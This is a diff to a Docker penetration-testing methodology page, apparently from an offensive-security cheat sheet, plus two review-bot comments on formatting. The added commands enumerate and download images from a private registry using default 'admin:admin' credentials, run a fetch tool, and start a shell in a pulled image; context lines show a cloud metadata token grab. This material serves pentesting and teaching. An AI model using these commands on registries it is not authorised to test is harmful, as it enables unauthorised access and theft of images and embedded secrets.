diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md index c4682cf..26ca5d9 100644 --- a/Methodology and Resources/Container - Docker Pentest.md +++ b/Methodology and Resources/Container - Docker Pentest.md @@ -70,6 +70,24 @@ Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. The ```powershell curl https://registry.example.com/v2//tags/list docker pull https://registry.example.com:443/: + +# connect to the endpoint and list image blobs +curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest +# download blobs +curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz +# automated download +https://github.com/NotSoSecure/docker_fetch/ +python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local +``` + +Access a private registry and start a container with one of its image + +```powershell +docker login -u admin -p admin docker.registry.local +docker pull docker.registry.local/wordpress-image +docker run -it docker.registry.local/wordpress-image /bin/bash ``` Access a private registry using OAuth Token from Google @@ -80,7 +98,6 @@ curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service docker login -e -u oauth2accesstoken -p "" https://gcr.io ``` - ## Exploit privileged container abusing the Linux cgroup v1 Prerequisite (at least one):
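Review bot: The bare line `https://github.com/NotSoSecure/docker_fetch/` in the first hunk sits inside the fenced block as a command, not a comment; it will fail if pasted into a shell, so prefix it with `#` (e.g. `# source: https://github.com/NotSoSecure/docker_fetch/`) like the surrounding `# automated download` line. Two smaller points in the same hunk: the fence is tagged `powershell` while the added commands are `curl` and `python` invocations, so `bash` fits better, and the blob download switches from `https://` to `http://` while the catalog, tags and manifest requests use `https://` with `-k`; pick one scheme so readers do not assume the registry serves both. In the added prose, "one of its image" should read "one of its images", and it is worth noting that `docker pull docker.registry.local/wordpress-image` with no tag resolves to `:latest`, which may not exist in the tag list returned just above.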
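Review bot: The second hunk deletes one of the blank lines between the closing fence and the `## Exploit privileged container abusing the Linux cgroup v1` heading; confirm that exactly one blank line remains after the fence, since a heading directly following a fence without a blank line renders inconsistently and trips markdownlint's blank-lines-around-headings rule.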